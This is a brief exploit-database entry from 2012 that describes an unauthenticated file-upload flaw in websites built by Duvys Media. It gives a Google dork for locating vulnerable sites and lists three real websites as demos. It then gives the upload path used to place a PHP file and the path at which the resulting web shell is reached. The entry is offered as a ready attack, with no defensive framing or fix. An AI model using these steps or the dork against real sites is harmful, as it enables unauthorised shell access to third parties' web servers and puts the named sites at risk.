id: 19090
date: 08/01/2012
title: Duvys Media web design and development file upload
author: Dz_ErRoR
cves: 

Exploit Title: [duvys media web design and development file upload]
# Date: [01.08.2012]
# Author: [Dz_ErRoR]
# Category:: [ webapps..]
# Google dork: [intext:Website by Duvys Media:]

# Tested on: [win7]
# Demo sites:
http://omnirehab.com/
http://www.boystownjerusalem.org/
http://www.kiruv.com/

# exploit
localhost/admin/upload/uploadFiles.php
upload file in .php extension (note that file is renamed and displayed)
http://www.kiruv.com/
# shell access
localhost/images/db/shell.php

...............................................
greetz to gaza and all algerian and muslim hackerz



#  0day.today [2023-03-24]  #